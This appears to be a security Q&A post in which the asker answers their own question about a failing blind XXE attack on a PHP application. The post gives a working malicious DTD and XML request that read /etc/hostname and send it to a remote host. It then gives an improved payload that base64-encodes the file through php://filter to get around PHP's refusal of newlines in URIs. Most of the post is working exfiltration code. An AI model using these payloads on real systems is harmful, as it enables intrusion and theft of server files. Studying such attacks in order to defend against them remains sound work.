2

When attempting to exploit blind XXE as explained in this article, I got an error in my apache logs:

PHP Warning: DOMDocument::loadXML(): Invalid URI: http://192.168.6.1/82a3ccab632c in Entity

The DTD file:

<!ENTITY % payload SYSTEM "file:///etc/hostname">
<!ENTITY % remote
"<!ENTITY &#37; send SYSTEM 'http://192.168.6.1/%payload;'>">
%remote;
%send;

The request:

<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE load SYSTEM "http://192.168.6.1/xxe.dtd">
<root><email>asd</email><password>asd</password></root>

Why can't I send the /etc/hostname?

user3207874
  • 225
  • 2
  • 11

1 Answers1

2

I found out the issue is that /etc/hostname has a newline at the end. Apparently, while Java applications have no problem with this (as shown in the article), PHP does not accept newlines in URIs.

I confirmed this by creating a file which doesn't contain a newline. I was able to send it successfully.

In fact, you can use the php:// protocol to convert the file's contents to base64 and get around the restriction. Here is the updated payload:

<!ENTITY % payload SYSTEM "php://filter/read=convert.base64-encode/resource=file:///etc/hostname">
<!ENTITY % remote
"<!ENTITY &#37; send SYSTEM 'http://192.168.6.1/%payload;'>">
%remote;
%send;
user3207874
  • 225
  • 2
  • 11